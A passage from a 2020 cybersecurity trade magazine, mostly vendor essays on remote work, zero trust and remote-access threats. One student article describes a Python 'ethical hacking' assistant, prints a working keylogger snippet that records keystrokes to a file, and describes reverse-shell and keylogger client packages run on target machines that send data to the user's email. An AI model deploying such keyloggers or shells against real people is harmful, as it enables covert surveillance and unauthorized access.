devices is safe. By deploying Zero Trust policies, info security teams can also implement fine-tuned user

access management to ensure that network capacity is maximized and that workers only have access to

the information that’s absolutely necessary.”

About the Author

Mike Riemer is the Global Chief Security Architect for Pulse Secure, where

he has worked for the last six years. He has over 37 years of IT and IT

Security experience and is a Certified Instructor on Firewall/Virtual Private

Networking, Intrusion Detection/Prevention, SSL/VPN and Network Access

Control disciplines. He previously spent 25 years with the U.S. Air Force

working in Cyber Security and Intelligence.

Cyber Defense eMagazineJuly 2020 Edition 120

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Post COVID-19 Cybersecurity and Future-of-Work

Predictions

By DivvyCloud by Rapid7, Chris DeRamus, VP of Technology, Cloud Security Practice

Remote work is here to stay:

“Some organizations (including DivvyCloud) preferred coming into the office for work prior to the

pandemic because we enjoyed the sense of community. But, the current situation has changed our

outlook on remote work, and the same is true for many organizations around the world. Many companies

are quickly realizing their employees are just as productive working from home through cloud apps and

services as they are in the office space. In fact, in many cases employees are even more productive

because they don’t waste time commuting. As such, we should expect plenty of organizations to transition

to more frequent (or even permanent) remote work models once stay-at-home orders have been lifted.

Organizations may even reduce or eliminate office spaces to cut back on overhead costs , especially

those looking to climb out of economic hardship caused by the pandemic.”

To support remote work, organizations will need to prioritize cloud spend:

“Organizations have been spending more on cloud infrastructure to support their remote workforces.

Increased demand spurred AWS’ sales to surpass $10 billion this past quarter and Azure is running out

of capacity in some regions. As a result, organizations will need to “tighten the operational belt” from a

budget perspective and ensure that the proper security and governance controls, virtual desktop

infrastructure (VDIs), and other key instances are implemented.

Cyber Defense eMagazineJuly 2020 Edition 121

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


For DivvyCloud and plenty of other organizations, real-time communications platforms like Slack and

Teams have been invaluable for navigating the work-from-home experience, and we can expect to see

a heightened demand for these tools even once this pandemic subsides. Additionally, organizations will

need to focus on identity and access management in their cloud infrastructure. This will ensure

employees are able to securely access the tools and resources they need to do their jobs while thwarting

fraudulent unauthorized attempts from bad actors.”

Choosing between security and innovation in the cloud will continue to be a common, avoidable

pitfall:

“Nearly 50% of developers and engineers bypass cloud security and compliance policies and just 58%

of organizations have clear guidelines for developers building applications in the public cloud. Developers

work hard and fast to deploy new features and services to meet market demands, but without the proper

guardrails in place, this can lead to misconfigured cloud instances, severe security flaws, and more.

In fact, in early April, it became publicly known that Zoom’s engineers bypassed common security

features, such as not requiring users to add unique file names before saving their videos. While this

allowed Zoom to support its exponential jump in demand (from 10 million daily users in December 2019

to over 200 million in March 2020), it also resulted in errors such as thousands of users’ videos being

made publicly accessible on unprotected Amazon buckets. This news added to a string of other privacy

concerns around Zoom. DevOps and security must be completely in sync to avoid similar pitfalls.

Engineers will begin to tackle cloud security flaws earlier in the build pipeline:

“Security and compliance practices have been mainly reactive, with teams scrambling to catch

security/compliance flaws after cloud resources are built. But as anyone in that position can attest, there’s

no putting the genie back in the lamp. Instead, engineers will need to focus on how “to-be-built”

infrastructure or changes will affect the security and compliance of their cloud footprint while they are still

in the continuous integration/continuous deployment pipeline.

For example, Zoom’s CEO pledged to shift the company’s engineering resources to proactively address

issues with measures such as a third-party review of changes before they’re made, white box pen tests

to further identify and address issues, and upgrading Zoom’s encryption scheme to AES 256-bit GCM

encryption. Other organizations will leverage capabilities such as Infrastructure as Code security to build

a virtual data model of what would have been built and either affirm or deny the compliance of proposed

changes while also warning engineers of potential violations, thus giving them the opportunity to learn

from the experience and incorporate learnings into future projects.”

IAM is (and will continue to be) the primary perimeter in cloud security:

“All users, apps, services, and systems in the cloud have an identity, and as organizations shifted to

remote styles of work, they quickly learned that these relationships are complex. Understanding the full

Cyber Defense eMagazineJuly 2020 Edition 122

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


picture of access in the cloud and working toward least privileged access are difficult , but necessary

endeavors to ensure security in the cloud. In the last couple months, plenty of enterprise security

professionals have realized that cloud identity and access management (IAM) is an area where they are

vulnerable because they lack insight into the complex problem.

The repercussions of poor IAM governance are substantial and sometimes unpredictable. For example,

last year a former AWS employee accessed over 100 million Capital One customers’ records after she

bypassed a misconfigured web application firewall, then used privileged escalation to access the data.

To protect the identity perimeter at scale, organizations need an automated monitoring and remediation

solution for access management, role management, identity authentication and compliance auditing – all

of which help enterprise security teams stay ahead in this complex landscape. Even once this pandemic

subsides, we will continue to see a great emphasis placed on cloud IAM, especially as organizations

continue to encourage remote work.”

About the Author

Chris is the VP of Technology, Cloud Security Practice at DivvyCloud

by Rapid7. He is a technical pioneer whose passion is finding

innovative and elegant new ways to deliver security, compliance and

governance to customers running at scale in hybrid cloud

environments. He remains deeply technical, writing code and diving

into the latest technologies and services being deployed by partners

like Amazon, Microsoft, Google, VMware, and OpenStack.

Before co-founding DivvyCloud, Chris was the Online Operations

Manager at Electronic Arts for the Mythic Studio where he helped

design, build and operate large scale cloud infrastructure spanning public and private clouds to run

Electronic Art’s largest online games (including Warhammer Online: Wrath of Heroes and Warhammer

Online: Age of Reckoning). He started his career as a Network & System Administrator at the U.S.

Department of Energy where he was mandated with a broad array of technical responsibilities including

security and compliance.

Chris earned his Bachelor of Business Administration in Computer Information Systems from James

Madison University.

Cyber Defense eMagazineJuly 2020 Edition 123

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Building A Telework Health Scorecard To Meet Surge

Requirements And Long-Term Resiliency

By Stan Lowe, Global Chief Information Security Officer, Zscaler

Over the past months, the U.S. Federal government has deployed solutions to keep employees

productive and secure from any location, including at home. The initial rapid response typically included

increasing capacity, deploying new remote access options, and enhancing security measures.

As CIOs and CISOs move forward from the initial crisis mode, they now need to take a harder look at the

systems in place – what is working and what is needed. But, to get the right answers, we have to ask

the right questions.

There are different sets of considerations and evaluation questions to ask in initial crisis phases vs. in

steady-state environments. IT leaders can build customized telework health scorecards for these two

phases to provide a comprehensive view and then prioritize the next steps.

Initial Crisis Telework Health Evaluation Criteria

1. What do we need to do? Prioritize the most important tasks. Then, consider the resources users

will need and what can be postponed or cut altogether.

2. Who needs access, when? Consider the access policies needed to align access with mission

priorities. Do all employees need to have always-on connectivity? What work requires only occasional

Cyber Defense eMagazineJuly 2020 Edition 124

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


connectivity? To ensure comprehensive, secure access, agencies may initially need to take a “tiered”

connectivity approach.

3. How can employees connect? Some employees may have had government-issued laptops and

devices prior to the crisis, but do all employees now need laptops? Prioritize needs. Then, evaluate

risks and develop BYOD policies and education.

4. Can we stagger work hours? It may not be possible to accommodate an almost entirely remote

workforce within the typical 9-5 hours. Some agencies can adjust work hours, moving mission critical

work to the “graveyard-shift” hours to ensure seamless connectivity to perform critical duties.

5. How do we improve performance/connection speed? As the network perimeter expands, many

agencies are moving to the cloud through a secure access service edge (SASE) model. Direct access

via internet breakouts provides fast, secure access for all users.

What’s Next? Evaluating and Evolving Telework Health for the Long Haul

Once mission critical teams are operational in remote environments and the organization has moved past

that initial crisis response – the next step is to take the lessons learned and evaluate how to continue

down the modernization path. What will drive simplicity, reduce costs, and create scalability for any future

COOP scenarios?

This is not a one-and-done process but should be built into ongoing IT operations and planning.

Here are six design architecture questions to help frame telework health – with the goal of driving digital

transformation and improve security, access, and support for remote employees:

1. Do we provide a seamless user experience with direct access to internal and external

applications?

Agencies need to adjust security from traditional, legacy appliance-based tools, such as VPNs, to a

solution that secures traffic no matter where the user or target application resides. Zero trust connections

allow users to directly access applications in any location. This eliminates the hair-pinning caused by

backhauling traffic through a VPN, reduces traffic, and reduces latency – ultimately, improving the user

experience. Zero trust also never puts users on the network, reducing the attack surface.

2. Do we have context-aware access?

Users should only be given access to resources and applications necessary for their job functions.

Agencies should develop clear access policies and rules enforced through a zero trust security model,

where only authorized users will be granted access to authorized applications. This can further limit eastwest

traffic on the network so that users will not reach applications they were not intended to reach.

Context-aware access also delivers benefits beyond work-from-home security, such as mergers and

acquisitions, cloud migration, third-party access, and more. Zero trust network access solutions address

all of these scenarios with simple policies that are user-centric, rather than network-centric.

Cyber Defense eMagazineJuly 2020 Edition 125

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


3. Are we enabling flexible deployment for instant and seamless expansion?

A cloud-based zero trust service can provide a scalable environment without placing a significant burden

on the IT team. Agencies can start with an initial use case and transition from broad policies to more

granular and specific policies as they go. And, many Federal agencies already have elements of zero

trust in their infrastructure, such as endpoint management, Continuous Diagnostics and Mitigation,

software-defined networking, micro-segmentation, and cloud monitoring. Once zero trust access is fully

operational, decommission VPN access for the group, then iterate as necessary.

4. How are we providing comprehensive visibility and troubleshooting that enables rapid userissue

resolution?

In a legacy environment, you can’t protect what you don’t know is there. A disadvantage of legacy

solutions is that data is often distributed across the environment, and agencies often use complex tools

with multiple interfaces, methodologies, and terminologies. This creates a higher likelihood that bad

actors could be hiding in the background, hoping to be overlooked. Zero trust provides IT administrators

with a single pane of glass view to manage, administer, and log users in one place. Administrators will

have full visibility and control into the distributed environment.

5. How do we reduce security and remote access infrastructure maintenance requirements?

Appliance-based remote access solutions constantly need updates on firmware, software, security, and

policies to keep up-to-date with technology and advancing security risks. A cloud Software-as-a-Service

model greatly reduces management and upkeep. This can free up time for agencies to focus on more

critical mission needs along with improving their policies, instead of patching security holes.

6. What will ensure scalability for future COOP scenarios?

Legacy remote access solutions, such as VPNs, may require adjustments to bandwidth, throughput, or

additional technology adoption to scale to meet operational needs. Many agencies’ initial reactions to

the current crisis have been to grow capacity by implementing new infrastructure or adding new

appliances. But, a cloud-native capability is the only solution that can easily scale up and down as

needed when future COOP scenarios arise.

Cloud-delivered zero trust SASE models will transition security from network-centric controls and remote

network connectivity to user-centric and application-centric security, designed to support highly

distributed teams working beyond the traditional network perimeter.

One thing we’ve learned from these past months is that every agency needs a systematic process to

evaluate telework health. These questions and review processes will create a stronger, more resilient

government that can keep employees safe, productive, and focused on delivering citizen services.

Cyber Defense eMagazineJuly 2020 Edition 126

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


About the Author

Stan Lowe,Global Chief Information Security Officer.Stan

Lowe, a cybersecurity and technology executive, has

successfully led transformational change in large, complex

environments, as well as small and mid-size cybersecurity

and IT organizations.

As Zscaler Global Chief Information Security Officer, Stan

oversees the security of the Zscaler enterprise and works with the product and operations groups to

ensure that Zscaler products and services are secure. Part of his focus is to work with customers to help

them fully utilize Zscaler services and realize the maximum return on their investment.

Prior to joining Zscaler, Stan served as the VP & Global Chief Information Security Officer for

PerkinElmer, where he was responsible for global enterprise security and privacy. He has also been a

Cyber Security Principal at Booz Allen Hamilton.

Stan has extensive federal experience, serving as the U.S. Department of Veterans Affairs (VA) Deputy

Assistant Secretary for Information Security, Chief Information Security Officer, and Deputy Chief Privacy

Officer, as well as Deputy Director of the Department of Defense/VA Interagency Program Office. Before

joining the VA, Stan served as Chief Information Officer of the Federal Trade Commission. Stan’s public

service record extends to the U.S. Department of Interior in the Bureau, the U.S. Postal Service Inspector

General, and the U.S. Navy.

Stan has also served as an executive in several technology startups, and currently serves on several

boards advising on cybersecurity. He is a frequent speaker and writer on security topics.

Cyber Defense eMagazineJuly 2020 Edition 127

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


CERT Warns Bad Actors Are Targeting Remote

Access – How Security Operations Find And Route These

“Below The Radar” Attacks

New Ransomware/Exfiltration Campaign Targeting Remote Access Resists Resolution Through Data

Restoration

By Saryu Nayyar, CEO, Gurucul

Remote access tools, such as VPN’s, RDP, VNC, Citrix, and others, have always been an inviting target

for attackers. Even 2003’s Matrix Reloaded used an exploit against an old version of Secure Shell (SSH)

as a plot device in a rare cinematic example of a real-world cyber-security threat. The recent shift to a

remote workforce in response to a global pandemic has made remote access an even more inviting target

for threat actors of all stripes.

As a recent report from New Zealand’s CERT pointed out, malicious actors are actively focusing on

remote access vectors, using a range of attack techniques. While unpatched systems are an ongoing

issue, attackers are also targeting weak authentication schemes, including a notable lack of two-factor

authentication. The users themselves are also a primary target. Targeted email such as spear phishing,

which goes for a specific target, or cast-netting, that targets people within a single organization, have a

history of success and have seen a noticeable rise.

Fortunately, information security professionals still have a range of tools and techniques they can use to

help prevent breaches and to mitigate them when they do happen.

Many attack scenarios, especially ones involving remote access attacks, start with targeting the users

themselves. Many penetration testers will tell you the users are the easiest target and the first thing

they’ll go after. But this also gives an organization the opportunity to convert their user base from part of

the attack surface into their first line of defense. Making sure you have trained them on best practices

and have enabled a strong multi-factor authentication scheme can go a long way to preventing

unauthorized access.

Cyber Defense eMagazineJuly 2020 Edition 128

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


For many organizations, the Security Operations team, rather than their users, is the main line of

defense. Even when the services are provided whole, or in part, by a third party, they are the ones who

have the ultimate responsibility for the organization’s security well-being. Which means assuring they

have the correct tools and the right training is as important as making sure the users are trained and

equipped. The question becomes whether they have the right tools and training to identify and mitigate

attack profiles that have now shifted to target the remote workforce.

The threats they have been historically focused on have not disappeared, but they may no longer be the

primary attack surface. Likewise, the tools they use to identify and mitigate attacks may not be the best

ones now that the attacker’s focus has shifted.

Threat actors have become increasingly skilled at compromising systems and then hiding their activity

“below the radar” to avoid detection, which makes their activity harder to detect. More so now that they

have a remote workforce to both target for attack and use for concealment. That means the SecOps

team will need to look at the situation holistically rather than relying on single indicators of compromise.

To that end, an advanced security analytics platform that can consolidate all the organization’s security

data into a single place and then perform AI-based analytics the entirety of the data may be in order. By

looking at all the information, it is possible to identify anomalous behavior that differs subtly from what’s

expected, or accepted, for a normal user. That can be the first indication of a compromise. Using

machine learning techniques, the system can adapt to the changing threat surface and present a riskbased

assessment to the SecOps team.

Combined with their existing tools and efficient automation, security operations personnel can get ahead

of an attack to keep a single compromised account or remote access system from escalating to a serious

data breach.

About the Author

Saryu Nayyar is the CEO of Gurucul. She is an internationally

recognized cybersecurity expert, author and speaker with more

than 15 years of experience in the information security, identity

and access management, IT risk and compliance, and security

risk management sectors. She was named EY Entrepreneurial

Winning Women in 2017. She has held leadership roles in

security products and services strategy at Oracle, Simeio, Sun

Microsystems, Vaau (acquired by Sun) and Disney, and held

senior positions in the technology security and risk management practice of Ernst & Young. She is

passionate about building disruptive technologies and has several patents pending for behavior analytics,

anomaly detection and dynamic risk scoring inventions.

Saryu can be reached on Twitter at @Gurucul

Cyber Defense eMagazineJuly 2020 Edition 129

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


CRYPTO

An Amalgamation of Cyber Defense and Ethical Hacking Mechanisms

By Staford Titus S

Prelude

Security on its own is a misnomer in this technological and (for the most part) cybernated era. Cyber-

Security has emerged as a crucial factor in protecting almost every, or atleast the online aspect of human

lives. The preponderance of electronic devices used are computers, including mobile phones, Smart TVs

and even smart watches, all of which contain personal or business data. Cybercrimes take place

ubiquitously, wrecking havoc by causing loss and sometimes even misuse of these information.

According to RiskIQ’s 2019 Evil Internet Minute, cybercrimes cost around $2.9 million dollars to the global

economy every minute. This invokes the necessity to secure data, to prevent it from being stolen or

compromised. It is thus, unerring to assume that cybercrimes are imminent, and hence, preventive

countermeasures are required to be set in place to sail above these turbulent waves of cyber-attacks.

Centralizing this theme, initialised the development of Crypto. The idea involves developing an AI

assistant that is capable of implementing secure policies using built-in security tools and also aid in ethical

hacking operations. For those of you, for whom, on reading the word AI, nightmares of AI world

domination are imminent:

Cyber Defense eMagazineJuly 2020 Edition 130

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Fig 1: AI Meme

This article documents the several security and hacking methodologies infrastructured in Crypto. A good

number of security policies and frameworks have been implemented to help secure the systems.

The Root

The developmental strategies involved are loosely adhered to and inspired by the control

strategies/countermeasures discussed by one, Charles P. Pfleeger in the book “Security in Computing”.

According to Fig 2 we can deal with cyber attacks in the following ways:

1. prevent it, by blocking the attack or closing the vulnerability

2. deter it, by making the attack harder but not impossible

3. deflect it, by making another target more attractive (or this one less so)

4. mitigate it, by making its impact less severe

5. detect it, either as it happens or some time after the fact

6. recover from its effects

“Prevention is better than cure!” Ensuing that statement is what is aimed to be accomplished, since it’s

always better to prevent an attack, than building back upon its wreckage. The aforementioned strategies

are implemented in several different ways, of which, an example is the Intrusion Detection System, that

helps detect anomalies and intrusions and direct it to honeypots or isolated networks, in turn incorporating

a pooled approach of the control strategies.

Cyber Defense eMagazineJuly 2020 Edition 131

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Fig 2: Control Strategies from the book “Security in Computing”

Under the Hood and UI

Built with primary intentions to implement security mechanisms and countermeasures along with hackeraiding

tools, fueling Crypto’s underlying architecture is good old Python. Python was considered over

other programming languages due to the sheer size of the open-source libraries and packages that it

offers. Eel was introduced in the infrastructure to establish undeterred connection between the frontend

and backend functions/mechanisms. Eel is a little Python library for making simple Electron-like offline

HTML/JS GUI apps. Eel offered so much more than it promised which helped incorporate several features

which previously couldn’t be fused. Implementing Eel is as simple as adding an “@eel.expose” line before

a function in python. Contemplating over the versatility as well as user-friendliness and also considering

the various design milestones that could be reached using HTML and CSS, the offering is not a CLI tool

but has a natty looking GUI. Centre-Bottom is the user input, Top-Middle is the chat box, Bottom-Left is

the news tab, Bottom-Right is the console, that displays all of the console logs and messages and Top-

Right is the Date & Time and weather data. Top-Left is reserved for popup menus. The next few sections

elucidate the several security and hacking mechanisms implemented in the project module.

Cyber Defense eMagazineJuly 2020 Edition 132

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Fig 3: Screengrab of Crypto’s UI

Security Mechanisms

Honeypot

Luring an unsuspicious attacker into a trap is the singular mechanism that a Honeypot implements.

According to wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some

manner, counteract attempts at unauthorized use of information systems. Creation of honeypot on any

port belies it as a decoy enticing to the attackers, thus enabling prevention or at least deceleration of

attacks to the main system. Logging the honeypot environment for any of the activities performed by

attackers mistaking the honeypot for a real loophole is also implemented to enhance the security policy.

The logs can be sent to the users’ mail or even stored on remote servers such as graylog for future

pattern analysis. Below is a code sample of the honeypot:

@eel.expose

def honeypot():

LHOST = '0.0.0.0'

LPORT = 1024

RHOST = '192.168.29.203'

RPORT = 9000

BANNER = '220 ProFTPD 1.2.8 Server\nName: '

Cyber Defense eMagazineJuly 2020 Edition 133

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


TIMEOUT = 10

listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

def hon():

print ('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))

eel.test('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))

atexit.register(exit_handler)

listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

listener.bind((LHOST, LPORT))

listener.listen(5)

while True:

(insock, address) = listener.accept()

insock.settimeout(TIMEOUT)

print ('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' + str(LPORT))

eel.test('[*] Honeypot connection from ' + address[0] + ':' + str(address[1]) + ' on port ' +

str(LPORT))

try:

insock.send(BANNER.encode())

data = insock.recv(1024)

except socket.error as e:

sendLog(address[0],'Error: ' + str(e))

else:

sendLog(address[0],data)

finally:

insock.close()

Cyber Defense eMagazineJuly 2020 Edition 134

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


hon()

Fig 4: Screengrab of Honeypot in Action

Intrusion Detection System

Intrusion Detection is a particularly, very important mechanism to implement, since detecting an anomaly

or intrusion is the fundamental step in protecting a system. It is based on strategies involved in applying

round-the clock detection and scanning. The IDS is created as a virtual network using mininets which

serve as honeypot hosts that continually monitor the traffic flowing in and out of the network for anomalies.

If an anomaly or outlier is detected, then an email is sent to the user of the same, and fake SYN packets

are sent for the attackers to connect to a virtualized and isolated mininet network. This mechanism is still

under rudimentary development and testing owing to the length and breadth of operations and functions

it aims to deliver.

Parser Differential

This mechanism is implemented inorder to cripple the various elf executable decompilers out there.

Hence, the given c program code is run through an algorithm to make it unreadable by the decompilers

such as radare2 or even gdb. This mechanism is highly influenced by LiveOverflow’s Reversing series.

Hence cracking programs to find license keys get much harder. This parser differential module allows

the user to upload C programs that they want to scramble and hence prevent cracking. The underlying

algorithm is quite simple but extremely effective. Only one random byte within the code is scrambled so

that it renders the whole code unreadable to decompilers but not to the Linux terminal. Hence the code

can be executed but not decompiled.

Facial Recognition

Facial Recognition is a Biometric Artificial Intelligence based algorithm that can uniquely identify a person

by analyzing patterns based on the person's facial textures and shape. Facial Recognition has been

Cyber Defense eMagazineJuly 2020 Edition 135

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


implemented based on the javascript face recognition library using Haar-Cascades. Hence, this

implementation enhances the security disabling misuse of the features by strangers or unknown

individuals.

Hacking Mechanisms

Port Scanning

Reconnaissance is the first step to any hacking activity, since it is highly important to analyze the intended

target on an intricate, or at the least, a basic level. Port scanning is one such pre-enumeration method

used to identify open ports and services available on a network host. It could also be considered as a security mechanism,

since from the countermeasures defined above, it is a method of detection/prevention. It can be performed for detection of

open ports within any network, enabling admins to close or secure unused or time-constrained ports. Hackers, on the other

hand, can use port scanning to identify the open ports through which they can access the network to perform ping attacks or

smurf attacks at the least. Implementation of this mechanism requires the python nmap module that supports various types

of scans.Fig 5 depicts the port scanning process.

Fig 5: Port Scanning demonstration

Reverse Shell

Gaining access to target systems could be a pain, hence, Reverse Shells have been integrated to provide

substantial aid in enumeration and forensic analysis. For this, a client side package is provided, which

when run on the target machine, would in turn activate the reverse shell, establishing connection by

binding sockets over ports. Once the reverse shell is active, users can type in unix commands to access

the data and such on the target machine. It also enables users to download or upload files over ftp

connections.

Keylogger

The keylogger is another great tool which can be used to log keystrokes. Users are provided with a client

package which will run in the background on the target machine and will be able to record keystrokes

Cyber Defense eMagazineJuly 2020 Edition 136

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


with high-precision and also send keylogger data to the user’s email. An example code snippet of the

keylogger is as below:

from pynput.keyboard import Listener

def logger(key):

letter = str(key)

letter = letter.replace("'", "")

if letter == 'Key.space':

letter = ' '

if letter == 'Key.shift_r':

letter = ''

if letter == "Key.ctrl_l":

letter = ""

if letter == "Key.enter":

letter = "\n"

with open("log.txt", 'a') as f:

f.write(letter)

with Listener(on_press=logger) as l:

l.join()

Cyber Defense eMagazineJuly 2020 Edition 137

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Encode/Decode

Any and every pentester or hacker would have, with no doubts, faced encoded data in their several

hacking endeavours. Hence several of the most popular encoding/decoding schemes such as Base64,

URL, Brainfuck, JS Obfuscation, etc have been implemented. Encryption using AES(Advanced

Encryption Standard) is also provided as depicted in Fig 6.

Fig 6: AES Encryption

Auxiliary Features/Mechanisms

The several auxiliary mechanisms intertwined are:








Captcha Breaker

Strong Password Generator

File Scanning

Email Sender

Time and Weather

News

AI you can converse with

Conclusion

At present, Cyber-crimes have emerged more dangerous than ever before, embodying menacing

hackers from all around the globe. It is therefore, high-time that Cyber security is accommodated in the

front seat, enabling us to fight back. The above documented approach of implementation of the security

policies are but a small step in aiding Ethical Hackers. Hopefully, this article succeeded in portraying “a

method” to embrace the countermeasures and security mechanisms.

Cyber Defense eMagazineJuly 2020 Edition 138

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


References

“Security in Computing” by Charles P. Pfleeger.

LiveOverflow on youtube or at www.liveoverflow.com

Mininet : Rapid Prototyping for Software Networks

Xavier A Larriva-Novo Mario Vega-Barbas “Evaluation of Cybersecurity Data Set Characteristics for Their

Applicability to Neural Networks Algorithms Detecting Cybersecurity Anomalies” 01 January 2020

About the Author

I am a budding Ethical Hacker with a towering interest in the security

field. I am currently pursuing my Bachelors in Computer Science

and Engineering at Jaya Engineering College in Chennai, India. I

have participated in several CTF competitions and completed

several courses on pentesting. My interest in cyber-security was

piqued by the length and breadth of its applications and the thrill

involved in solving the challenges. Hence, to no one’s surprise, I am

currently working on several vulnhub boxes and overthewire

challenges. Anybody wanting to collaborate can connect on twitter

(@stafordtitus) or linkedIn ( https://www.linkedin.com/in/stafordtitus-643638147/

).

Cyber Defense eMagazineJuly 2020 Edition 139

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 140

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 141

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 142

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 143

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 144

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 145

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 146

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 147

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 148

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 149

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 150

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 151

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 152

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 153

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 154

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS

“Amazing Keynote”

“Best Speaker on the Hacking Stage”

“Most Entertaining and Engaging”

Gary has been keynoting cyber security events throughout the year. He’s also been a

moderator, a panelist and has numerous upcoming events throughout the year.

If you are looking for a cybersecurity expert who can make the difference from a nice event to

a stellar conference, look no further email marketing@cyberdefensemagazine.com

Cyber Defense eMagazineJuly 2020 Edition 155

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


You asked, and it’s finally here…we’ve launched CyberDefense.TV

At least a dozen exceptional interviews rolling out each month starting this summer…

Market leaders, innovators, CEO hot seat interviews and much more.

A new division of Cyber Defense Media Group and sister to Cyber Defense Magazine.

Cyber Defense eMagazineJuly 2020 Edition 156

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Free Monthly Cyber Defense eMagazine Via Email

Enjoy our monthly electronic editions of our Magazines for FREE.

This magazine is by and for ethical information security professionals with a twist on innovative consumer

products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our

mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best

ideas, products and services in the information technology industry. Our monthly Cyber Defense e-

Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare

arena plus we’ll inform you as next generation and innovative technology vendors have news worthy of

sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here

to sign up today and within moments, you’ll receive your first email from us with an archive of our

newsletters along with this month’s newsletter.

By signing up, you’ll always be in the loop with CDM.

Copyright (C) 2020, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G.

SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a

CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com,

CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability

Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465,

Cyber Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS#

078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com

All rights reserved worldwide. Copyright © 2020, Cyber Defense Magazine. All rights reserved. No part of this

newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying,

recording, taping or by any information storage retrieval system without the written permission of the publisher

except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of

the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may

no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect

the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content

and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at

marketing@cyberdefensemagazine.com

Cyber Defense Magazine

276 Fifth Avenue, Suite 704, New York, NY 1000

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide.

marketing@cyberdefensemagazine.com

www.cyberdefensemagazine.com

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)

Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 07/01/2020

Cyber Defense eMagazineJuly 2020 Edition 157

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


TRILLIONS ARE AT STAKE

No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES

Released:

https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH

In Development:

Cyber Defense eMagazineJuly 2020 Edition 158

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


Cyber Defense eMagazineJuly 2020 Edition 159

Copyright © 2020, Cyber Defense Magazine. All rights reserved worldwide.


8 Years in The Making…

Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know

What You Think. It's mobile and tablet friendly and superfast. We hope you

like it. In addition, we're shooting for 7x24x365 uptime as we continue to

scale with improved Web App Firewalls, Content Deliver Networks (CDNs)

